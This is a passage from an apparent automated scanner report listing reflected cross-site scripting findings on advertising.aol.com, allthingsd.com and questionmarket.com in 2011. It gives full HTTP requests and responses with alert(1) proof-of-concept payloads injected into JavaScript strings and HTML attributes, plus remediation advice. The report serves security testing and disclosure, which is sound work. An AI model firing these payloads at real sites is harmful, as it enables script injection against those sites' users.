Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/fac16"-alert(1)-"9688e994782/8/3/1715267017/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.33. http://advertising.aol.com/token/8/3/547826303/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/547826303/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99357"-alert(1)-"4ee7bb08df1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /99357"-alert(1)-"4ee7bb08df1/8/3/547826303/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/99357"-alert(1)-"4ee7bb08df1/8/3/547826303/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.34. http://advertising.aol.com/token/8/3/609451831/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/609451831/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5176c"-alert(1)-"bf7c2c63e04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /5176c"-alert(1)-"bf7c2c63e04/8/3/609451831/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/5176c"-alert(1)-"bf7c2c63e04/8/3/609451831/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.35. http://allthingsd.com/20110906/history-repeats-itself-at-hewlett-packard-webos-unit/ [refcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://allthingsd.com
Path:   /20110906/history-repeats-itself-at-hewlett-packard-webos-unit/

Issue detail

The value of the refcat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43cc3"style%3d"x%3aexpression(alert(1))"00b4de691d2 was submitted in the refcat parameter. This input was echoed as 43cc3"style="x:expression(alert(1))"00b4de691d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /20110906/history-repeats-itself-at-hewlett-packard-webos-unit/?refcat=enterprise43cc3"style%3d"x%3aexpression(alert(1))"00b4de691d2 HTTP/1.1
Host: allthingsd.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=40; atd_cookie_notice=2; atd_social_notice=3; __unam=c2a74e1-13244e87052-2593e6fc-6; __utma=1.293351741.1315416510.1315416510.1315416510.1; __utmb=1.1.10.1315416510; __utmc=1; __utmz=1.1315416510.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; _chartbeat2=zh35qdggj5pjfrad; s_sq=djglobal%2Cdjatd%3D%2526pid%253DATD_Kara%252520Swisher_CrunchFund%25253F%252520Unethical%252520Ventures%25253F%252520Pig%252520Pile%252520Partners%25253F%252520No%252520Matter%252520What%252520You%252520Call%252520It%25252C%252520It%252526%2525238217%25253Bs%252520Business%252520as%252520Usual%252520in%252520Silicon%252520Valley.%2526pidt%253D1%2526oid%253Dhttp%25253A//allthingsd.com/20110906/history-repeats-itself-at-hewlett-packard-webos-unit/%25253Frefcat%25253Denterpri%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 07 Sep 2011 12:33:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Vary: Cookie
X-Pingback: http://allthingsd.com/xmlrpc.php
Link: <http://allthingsd.com/?p=116953>; rel=shortlink
Content-Length: 85118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/allthingsd.com/enterprise43cc3"style="x:expression(alert(1))"00b4de691d2_singlepost;tile=1;sz=300x250;ord=123456789?" target="_blank">
...[SNIP]...

1.36. http://allthingsd.com/20110906/history-repeats-itself-at-hewlett-packard-webos-unit/ [refcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://allthingsd.com
Path:   /20110906/history-repeats-itself-at-hewlett-packard-webos-unit/

Issue detail

The value of the refcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fb07'%3balert(1)//4d2d623eb2a was submitted in the refcat parameter. This input was echoed as 3fb07';alert(1)//4d2d623eb2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /20110906/history-repeats-itself-at-hewlett-packard-webos-unit/?refcat=enterprise3fb07'%3balert(1)//4d2d623eb2a HTTP/1.1
Host: allthingsd.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=40; atd_cookie_notice=2; atd_social_notice=3; __unam=c2a74e1-13244e87052-2593e6fc-6; __utma=1.293351741.1315416510.1315416510.1315416510.1; __utmb=1.1.10.1315416510; __utmc=1; __utmz=1.1315416510.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; _chartbeat2=zh35qdggj5pjfrad; s_sq=djglobal%2Cdjatd%3D%2526pid%253DATD_Kara%252520Swisher_CrunchFund%25253F%252520Unethical%252520Ventures%25253F%252520Pig%252520Pile%252520Partners%25253F%252520No%252520Matter%252520What%252520You%252520Call%252520It%25252C%252520It%252526%2525238217%25253Bs%252520Business%252520as%252520Usual%252520in%252520Silicon%252520Valley.%2526pidt%253D1%2526oid%253Dhttp%25253A//allthingsd.com/20110906/history-repeats-itself-at-hewlett-packard-webos-unit/%25253Frefcat%25253Denterpri%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 07 Sep 2011 12:33:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Vary: Cookie
X-Pingback: http://allthingsd.com/xmlrpc.php
Link: <http://allthingsd.com/?p=116953>; rel=shortlink
Content-Length: 84939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<script language="JavaScript" type="text/javascript">
           if("undefined"==typeof(ord)) ord=Math.random()*10000000000000000;
           if("undefined"==typeof(ad_zones)) ad_zones=[]; ad_zones.push('enterprise3fb07';alert(1)//4d2d623eb2a_singlepost');
           if("undefined"==typeof(ad_sections)) ad_sections=[]; ad_sections.push('allthingsd.com');
           document.write('<script language="JavaScript" type="text/javascript" src="http://ad.doublec
...[SNIP]...

1.37. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [auto_ctl_invite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the auto_ctl_invite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2a9f'-alert(1)-'f17657d39c9 was submitted in the auto_ctl_invite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0f2a9f'-alert(1)-'f17657d39c9&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:32 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315398872; expires=Sun, 11 Sep 2011 16:34:32 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
ady_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0f2a9f'-alert(1)-'f17657d39c9&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7';
try {
   if (dle.sr
...[SNIP]...

1.38. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16939'-alert(1)-'633f27d02c8 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=16939'-alert(1)-'633f27d02c8&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:28 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315398868; expires=Sun, 11 Sep 2011 16:34:28 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
t;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=16939'-alert(1)-'633f27d02c8&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7';
...[SNIP]...

1.39. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78a38'-alert(1)-'cf5908a5123 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM778a38'-alert(1)-'cf5908a5123 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:37 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: LP=1315398877; expires=Sun, 11 Sep 2011 16:34:37 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
g=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM778a38'-alert(1)-'cf5908a5123';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/javas
...[SNIP]...

1.40. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5433'-alert(1)-'ded7162e703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7&f5433'-alert(1)-'ded7162e703=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:41 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: LP=1315398881; expires=Sun, 11 Sep 2011 16:34:41 GMT; path=/; domain=.questionmarket.com
Content-Length: 2705
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7&f5433'-alert(1)-'ded7162e703=1';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/jav
...[SNIP]...

1.41. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fee25'-alert(1)-'65069f0c0a8 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1fee25'-alert(1)-'65069f0c0a8&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
